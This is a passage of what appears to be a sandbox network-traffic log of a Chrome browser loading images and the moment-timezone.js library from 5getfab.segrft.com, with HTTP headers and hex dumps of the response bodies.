                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://5getfab.segrft.com/plus/css/common/index.css?ver=1700473959
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:52 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:52 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 376
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:10 GMT
                                                      ETag: "5fc5abde-178"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:52 UTC376INData Raw: 47 49 46 38 39 61 01 00 52 02 d5 00 00 05 69 4d 00 79 5a 04 6d 50 00 7a 5b 05 6b 4e 02 76 57 02 77 57 05 6c 4f 02 79 5a 04 72 54 03 75 56 04 70 52 04 71 53 05 6a 4e 04 6e 51 04 73 55 01 79 5a 02 77 58 03 74 56 02 75 57 01 7b 59 02 78 59 04 6f 52 01 7a 5a 02 79 59 03 73 55 01 7b 5a 05 6a 4d 04 6e 50 01 77 58 05 69 4c 00 79 58 04 73 54 02 78 58 04 6f 51 04 72 53 04 70 53 03 75 57 02 78 57 04 6b 4e 02 77 59 01 79 5b 01 7b 5b 03 74 55 00 7b 5c 01 7a 59 01 7a 5b 05 68 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 52 02 00 06 95 c0 97 70 48 2c 1a 8f c8 a4 72 c9 6c 3a 9f d0 a8 74 4a ad 5a af d8 ac 76 2b f4 00 be df cd
                                                      Data Ascii: GIF89aRiMyZmPz[kNvWwWlOyZrTuVpRqSjNnQsUyZwXtVuW{YxYoRzZyYsU{ZjMnPwXiLyXsTxXoQrSpSuWxWkNwYy[{[tU{\zYz[hL!,RpH,rl:tJZv+


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      69192.168.2.44982120.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:52 UTC657OUTGET /images_plus/index/bg-sports-right.gif HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://5getfab.segrft.com/plus/css/common/index.css?ver=1700473959
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:52 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:52 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 953
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:10 GMT
                                                      ETag: "5fc5abde-3b9"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:52 UTC953INData Raw: 47 49 46 38 39 61 01 00 cc 00 f7 00 00 05 69 4d 01 7a 5a 01 7b 5b 04 6c 4f 04 6d 50 05 68 4c 02 76 57 02 77 58 03 71 53 04 6b 4e 04 6e 51 03 72 54 03 70 52 02 75 56 03 73 55 02 78 59 05 6a 4e 04 6f 51 05 6a 4d 02 74 56 01 79 59 01 79 5a 04 6b 4f 02 78 58 03 74 55 03 6f 52 04 6e 50 02 75 57 05 69 4c 03 73 54 03 70 53 02 79 59 01 7a 5b 04 6a 4e 42 95 7f 02 74 55 02 77 57 04 6c 50 07 40 2c 04 6f 52 06 9d 73 04 61 47 06 99 70 04 65 4a 06 9b 72 06 9c 72 04 62 48 04 63 48 05 73 54 05 74 55 06 92 6b 05 87 63 05 77 57 06 8f 69 04 68 4c 05 83 60 05 7b 5a 04 64 49 05 8a 65 05 8b 66 04 69 4d 06 98 6f 06 96 6e 06 95 6d 04 66 4b 05 7e 5c 06 9a 71 05 80 5e 05 7f 5d 05 70 52 05 85 62 05 79 59 04 6a 4d 05 81 5f 05 8c 67 05 8e 68 05 7a 59 04 67 4b 06 94 6c 06 91 6a 05 7d
                                                      Data Ascii: GIF89aiMzZ{[lOmPhLvWwXqSkNnQrTpRuVsUxYjNoQjMtVyYyZkOxXtUoRnPuWiLsTpSyYz[jNBtUwWlP@,oRsaGpeJrrbHcHsTtUkcwWihL`{ZdIefiMonmfK~\q^]pRbyYjM_ghzYgKlj}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      70192.168.2.44982220.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:52 UTC654OUTGET /images_plus/index/en/btn_start.png HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://5getfab.segrft.com/plus/css/common/index.css?ver=1700473959
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:52 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:52 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 944
                                                      Connection: close
                                                      Last-Modified: Wed, 15 Mar 2023 04:24:56 GMT
                                                      ETag: "64114898-3b0"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:52 UTC944INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 0f 08 03 00 00 00 44 17 b8 bd 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 01 1a 50 4c 54 45 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 06 00 01 ff ff ff ff ff ff 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 e8 ce 32 b1 9c 26 06 00 01 7a 6a 1a c5 af 2a 30 26 0a 67 59 16 06 00 01 06 00 01 6b 5c 17 8a 79 1d db c2 2f e8 ce 32 bc a6 28 06 00 01 c4 ad 2a 56 49 12 06 00 01 e6 cc 31 e5 cb 31 06 00 01 bd a7 28 cd b6 2c ce b7 2c 54 47 12 0b 05 02 06 00 01 af 9a 25 65 56 15 2d 24 09 9b 88 21 8b 7a 1e 06 00
                                                      Data Ascii: PNGIHDRPDgAMAasRGBPLTE2&zj*0&gYk\y/2(*VI11(,,TG%eV-$!z


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      71192.168.2.44982320.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:52 UTC390OUTGET /plus/js/custom/moment-timezone.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:52 UTC320INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:52 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 196335
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-2feef"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:52 UTC3776INData Raw: 2f 2f 21 20 6d 6f 6d 65 6e 74 2d 74 69 6d 65 7a 6f 6e 65 2e 6a 73 0d 0a 2f 2f 21 20 76 65 72 73 69 6f 6e 20 3a 20 30 2e 35 2e 31 30 0d 0a 2f 2f 21 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0d 0a 2f 2f 21 20 6c 69 63 65 6e 73 65 20 3a 20 4d 49 54 0d 0a 2f 2f 21 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 6f 6d 65 6e 74 2f 6d 6f 6d 65 6e 74 2d 74 69 6d 65 7a 6f 6e 65 0d 0a 0d 0a 28 66 75 6e 63 74 69 6f 6e 20 28 72 6f 6f 74 2c 20 66 61 63 74 6f 72 79 29 20 7b 0d 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0d 0a 0d 0a 09 2f 2a 67 6c 6f 62 61 6c 20 64 65 66 69 6e 65 2a 2f 0d 0a 09 69 66 20 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 20 3d 3d 3d 20 27 66 75
                                                      Data Ascii: //! moment-timezone.js//! version : 0.5.10//! Copyright (c) JS Foundation and other contributors//! license : MIT//! github.com/moment/moment-timezone(function (root, factory) {"use strict";/*global define*/if (typeof define === 'fu
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 0a 09 09 09 09 69 3b 0d 0a 0d 0a 09 09 09 66 6f 72 20 28 69 20 3d 20 30 3b 20 69 20 3c 20 75 6e 74 69 6c 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 09 09 09 09 69 66 20 28 74 61 72 67 65 74 20 3c 20 75 6e 74 69 6c 73 5b 69 5d 29 20 7b 0d 0a 09 09 09 09 09 72 65 74 75 72 6e 20 69 3b 0d 0a 09 09 09 09 7d 0d 0a 09 09 09 7d 0d 0a 09 09 7d 2c 0d 0a 0d 0a 09 09 70 61 72 73 65 20 3a 20 66 75 6e 63 74 69 6f 6e 20 28 74 69 6d 65 73 74 61 6d 70 29 20 7b 0d 0a 09 09 09 76 61 72 20 74 61 72 67 65 74 20 20 3d 20 2b 74 69 6d 65 73 74 61 6d 70 2c 0d 0a 09 09 09 09 6f 66 66 73 65 74 73 20 3d 20 74 68 69 73 2e 6f 66 66 73 65 74 73 2c 0d 0a 09 09 09 09 75 6e 74 69 6c 73 20 20 3d 20 74 68 69 73 2e 75 6e 74 69 6c 73 2c 0d 0a 09 09 09 09 6d 61 78 20 20 20 20 20 3d
                                                      Data Ascii: i;for (i = 0; i < untils.length; i++) {if (target < untils[i]) {return i;}}},parse : function (timestamp) {var target = +timestamp,offsets = this.offsets,untils = this.untils,max =
                                                      2025-01-12 23:47:52 UTC4096INData Raw: 0a 09 09 09 69 66 20 28 69 6e 74 6c 4e 61 6d 65 29 7b 0d 0a 09 09 09 09 76 61 72 20 6e 61 6d 65 20 3d 20 6e 61 6d 65 73 5b 6e 6f 72 6d 61 6c 69 7a 65 4e 61 6d 65 28 69 6e 74 6c 4e 61 6d 65 29 5d 3b 0d 0a 09 09 09 09 69 66 20 28 6e 61 6d 65 29 20 7b 0d 0a 09 09 09 09 09 72 65 74 75 72 6e 20 6e 61 6d 65 3b 0d 0a 09 09 09 09 7d 0d 0a 09 09 09 09 6c 6f 67 45 72 72 6f 72 28 22 4d 6f 6d 65 6e 74 20 54 69 6d 65 7a 6f 6e 65 20 66 6f 75 6e 64 20 22 20 2b 20 69 6e 74 6c 4e 61 6d 65 20 2b 20 22 20 66 72 6f 6d 20 74 68 65 20 49 6e 74 6c 20 61 70 69 2c 20 62 75 74 20 64 69 64 20 6e 6f 74 20 68 61 76 65 20 74 68 61 74 20 64 61 74 61 20 6c 6f 61 64 65 64 2e 22 29 3b 0d 0a 09 09 09 7d 0d 0a 09 09 7d 20 63 61 74 63 68 20 28 65 29 20 7b 0d 0a 09 09 09 2f 2f 20 49 6e 74 6c
                                                      Data Ascii: if (intlName){var name = names[normalizeName(intlName)];if (name) {return name;}logError("Moment Timezone found " + intlName + " from the Intl api, but did not have that data loaded.");}} catch (e) {// Intl
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 2e 7a 6f 6e 65 45 78 69 73 74 73 20 20 20 3d 20 7a 6f 6e 65 45 78 69 73 74 73 3b 20 2f 2f 20 64 65 70 72 65 63 61 74 65 64 20 69 6e 20 30 2e 31 2e 30 0d 0a 09 74 7a 2e 67 75 65 73 73 20 20 20 20 20 20 20 20 3d 20 67 75 65 73 73 3b 0d 0a 09 74 7a 2e 6e 61 6d 65 73 20 20 20 20 20 20 20 20 3d 20 67 65 74 4e 61 6d 65 73 3b 0d 0a 09 74 7a 2e 5a 6f 6e 65 20 20 20 20 20 20 20 20 20 3d 20 5a 6f 6e 65 3b 0d 0a 09 74 7a 2e 75 6e 70 61 63 6b 20 20 20 20 20 20 20 3d 20 75 6e 70 61 63 6b 3b 0d 0a 09 74 7a 2e 75 6e 70 61 63 6b 42 61 73 65 36 30 20 3d 20 75 6e 70 61 63 6b 42 61 73 65 36 30 3b 0d 0a 09 74 7a 2e 6e 65 65 64 73 4f 66 66 73 65 74 20 20 3d 20 6e 65 65 64 73 4f 66 66 73 65 74 3b 0d 0a 09 74 7a 2e 6d 6f 76 65 49 6e 76 61 6c 69 64 46 6f 72 77 61 72 64 20 20 20
                                                      Data Ascii: .zoneExists = zoneExists; // deprecated in 0.1.0tz.guess = guess;tz.names = getNames;tz.Zone = Zone;tz.unpack = unpack;tz.unpackBase60 = unpackBase60;tz.needsOffset = needsOffset;tz.moveInvalidForward
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 31 77 70 30 20 4f 6e 30 20 31 7a 64 30 20 4c 7a 30 20 31 45 4e 30 20 46 62 30 20 63 31 30 20 38 6e 30 20 38 4e 64 30 20 67 4c 30 20 65 31 30 20 6d 6e 30 7c 31 35 65 36 22 2c 0d 0a 09 09 09 22 41 66 72 69 63 61 2f 43 61 73 61 62 6c 61 6e 63 61 7c 4c 4d 54 20 57 45 54 20 57 45 53 54 20 43 45 54 7c 75 2e 6b 20 30 20 2d 31 30 20 2d 31 30 7c 30 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 33 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 7c 2d 32 67 4d 6e 74 2e 45 20 31 33 30 4c 74 2e 45 20 72 62 30 20 44 64 30 20 64 56 62 30 20 62 36 70 30 20 54 58 30 20 45 6f
                                                      Data Ascii: 1wp0 On0 1zd0 Lz0 1EN0 Fb0 c10 8n0 8Nd0 gL0 e10 mn0|15e6","Africa/Casablanca|LMT WET WEST CET|u.k 0 -10 -10|0121212121212121213121212121212121212121212121212121212121212121212121212121212121212121212121212121|-2gMnt.E 130Lt.E rb0 Dd0 dVb0 b6p0 TX0 Eo
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 31 63 4e 30 20 31 63 4c 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6c 62 30 20 31 34 70 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20
                                                      Data Ascii: 1cN0 1cL0 14p0 1lb0 14p0 1nX0 11B0 1nX0 11B0 1nX0 14p0 1lb0 14p0 1lb0 14p0 1nX0 11B0 1nX0 11B0 1nX0 14p0 1lb0 14p0 1lb0 14p0 1lb0 14p0 1nX0 11B0 1nX0 11B0 1nX0 14p0 1lb0 14p0 1lb0 14p0 1nX0 11B0 1nX0 11B0 1nX0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 4b 6e 48 2e 63 20 4d 6e 30 20 31 69 4e 30 20 54 62 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4d 6e 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4d 6e 30 20 4d 4e 30 20 32 6a 7a 30 20 4d 4e 30 20 34 6c 58 30 20 75 31 30 20 35 4c 62 30 20 31 70 42 30 20 46 6e 7a 30 20 75 31 30 20 75 4c 30 20 31 76 64 30 20 53 4c 30 20 31 76 64 30 20 53 4c 30 20 31 76 64 30 20 31 37 7a 30 20 31 63 4e 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 61 73 6e 30 20 44 62 30 20 7a 76 64 30 20 42 7a 30 20 31 74 42 30 20 54 58 30 20 31 75 32 30 20 53 4c 30 20 31 76 64 30 20 54 62 30 20 31 77 70 30 20 54 57 30 20 67 30 70 30 20 31 30 4d 30 20 61 67
                                                      Data Ascii: KnH.c Mn0 1iN0 Tb0 1C10 LX0 1C10 LX0 1C10 LX0 1C10 Mn0 1C10 LX0 1C10 LX0 1C10 LX0 1C10 Mn0 MN0 2jz0 MN0 4lX0 u10 5Lb0 1pB0 Fnz0 u10 uL0 1vd0 SL0 1vd0 SL0 1vd0 17z0 1cN0 1fz0 1cN0 1cL0 1cN0 asn0 Db0 zvd0 Bz0 1tB0 TX0 1u20 SL0 1vd0 Tb0 1wp0 TW0 g0p0 10M0 ag
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 7a 30 20 31 45 4e 30 20 4c 7a 30 20 31 43 31 30 20 49 4c 30 20 31 48 42 30 20 44 62 30 20 31 48 42 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 4c 7a 30 20 31 7a 64 30 20 52 62 30 20 31 77 4e 30 20 57 6e 30 20 31 74 42 30 20 52 62 30 20 31 74 42 30 20 57 4c 30 20 31 74 42 30 20 52 62 30 20 31 7a 64 30 20 4f 6e 30 20 31 48 42 30 20 46 58 30 20 6c 35 42 30 20 52 62 30 7c 32 37 65 35 22 2c 0d 0a 09 09 09 22 41 6d 65 72 69 63 61 2f 42 61 68 69 61 5f 42 61 6e 64 65 72 61 73 7c 4c 4d 54 20 4d 53 54 20 43 53 54 20 50 53 54 20 4d 44 54 20 43 44 54 7c 37 31 20 37 30 20 36 30 20 38 30 20 36 30 20 35 30 7c 30 31 32 31 32 31 32 31 33 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 35 32 35 32 35 32 35 32 35 32 35
                                                      Data Ascii: z0 1EN0 Lz0 1C10 IL0 1HB0 Db0 1HB0 On0 1zd0 On0 1zd0 Lz0 1zd0 Rb0 1wN0 Wn0 1tB0 Rb0 1tB0 WL0 1tB0 Rb0 1zd0 On0 1HB0 FX0 l5B0 Rb0|27e5","America/Bahia_Banderas|LMT MST CST PST MDT CDT|71 70 60 80 60 50|0121212131414141414141414141414141414152525252525
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 4f 6e 30 20 31 48 42 30 20 46 58 30 20 31 43 31 30 20 4c 7a 30 20 31 49 70 30 20 48 58 30 20 31 7a 64 30 20 4f 6e 30 20 31 48 42 30 20 49 4c 30 20 31 77 70 30 20 4f 6e 30 20 31 43 31 30 20 4c 7a 30 20 31 43 31 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 52 62 30 20 31 7a 64 30 20 4c 7a 30 20 31 43 31 30 20 4c 7a 30 20 31 43 31 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 43 31 30 20 4c 7a 30 20 31 43 31 30 20 4c 7a 30 20 31 43 31 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 52 62 30 20 31 77 70 30 20 4f 6e 30 20 31 43 31 30 20 4c 7a 30 20 31 43 31 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 7a 64 30 20 4f 6e 30 20 31 43 31 30 20 4c 7a 30
                                                      Data Ascii: On0 1HB0 FX0 1C10 Lz0 1Ip0 HX0 1zd0 On0 1HB0 IL0 1wp0 On0 1C10 Lz0 1C10 On0 1zd0 On0 1zd0 Rb0 1zd0 Lz0 1C10 Lz0 1C10 On0 1zd0 On0 1zd0 On0 1zd0 On0 1C10 Lz0 1C10 Lz0 1C10 On0 1zd0 On0 1zd0 Rb0 1wp0 On0 1C10 Lz0 1C10 On0 1zd0 On0 1zd0 On0 1zd0 On0 1C10 Lz0
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 4d 30 20 44 43 30 7c 38 22 2c 0d 0a 09 09 09 22 41 6d 65 72 69 63 61 2f 44 61 77 73 6f 6e 7c 59 53 54 20 59 44 54 20 59 57 54 20 59 50 54 20 59 44 44 54 20 50 53 54 20 50 44 54 7c 39 30 20 38 30 20 38 30 20 38 30 20 37 30 20 38 30 20 37 30 7c 30 31 30 31 30 32 33 30 34 30 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 36 35 7c 2d 32 35 54 4e 30 20 31 69 6e 30 20 31 6f 31 30 20 31 33 56 30 20 53 65 72 30 20 38 78 30 30 20 69 7a 30 20 4c 43 4c 30 20 31 66 41 30 20
                                                      Data Ascii: M0 DC0|8","America/Dawson|YST YDT YWT YPT YDDT PST PDT|90 80 80 80 70 80 70|0101023040565656565656565656565656565656565656565656565656565656565656565656565656565656565656565656565656565656565656565656565|-25TN0 1in0 1o10 13V0 Ser0 8x00 iz0 LCL0 1fA0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      72192.168.2.44982420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:52 UTC381OUTGET /images_plus/header/common/kefu_icon.png HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:53 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:53 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 582
                                                      Connection: close
                                                      Last-Modified: Thu, 03 Dec 2020 05:14:15 GMT
                                                      ETag: "5fc87427-246"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:53 UTC582INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0f 00 00 00 10 08 03 00 00 00 fe 88 d5 36 00 00 01 44 50 4c 54 45 00 00 00 40 2a 00 4d 3b 00 6f 63 33 66 54 22 5d 3e 00 67 44 00 8d 6a 00 10 07 00 00 00 0d 00 03 02 00 10 00 18 07 00 fc fc ed ff f5 e4 fd e2 d4 e6 ca b9 f8 e8 b5 bf b6 b0 fd e0 9a b6 98 85 ce a5 48 cd ad 23 39 17 06 0a 00 02 01 09 01 51 33 00 3a 1f 00 0c 0d 00 ff f9 e1 ec e5 df ff f0 dd ff e8 d8 f6 e9 d6 de d7 d1 e9 e4 d0 f7 dd ce cf c1 ce d6 cf c9 f1 d7 c8 eb df c7 f3 d3 c6 c6 dc c5 da d5 c1 e5 bc c0 fc e6 bf fa ee be fe e0 bc e0 d4 bc ef d6 b8 d6 c9 b6 de c4 b5 ee e1 ad dc c7 aa e6 d0 a9 e0 c7 a9 e2 c4 a8 eb d9 a7 df d3 a3 be a4 93 9c 9e 93 f5 d8 92 cb a7 91 d5 b4 87 c2 b6 86 76 78 84 c7 b5 83 e5 c8 82 cf ae 81 b3 9e 81 a2 96 7e b2
                                                      Data Ascii: PNGIHDR6DPLTE@*M;oc3fT"]>gDjH#9Q3:vx~


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      73192.168.2.44982520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:52 UTC625OUTGET /images_plus/index/en/NCDBC_210x204.png?ver=1700473741 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:53 UTC355INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:53 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 9237
                                                      Connection: close
                                                      Last-Modified: Mon, 20 Nov 2023 09:49:01 GMT
                                                      ETag: "655b2b8d-2415"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
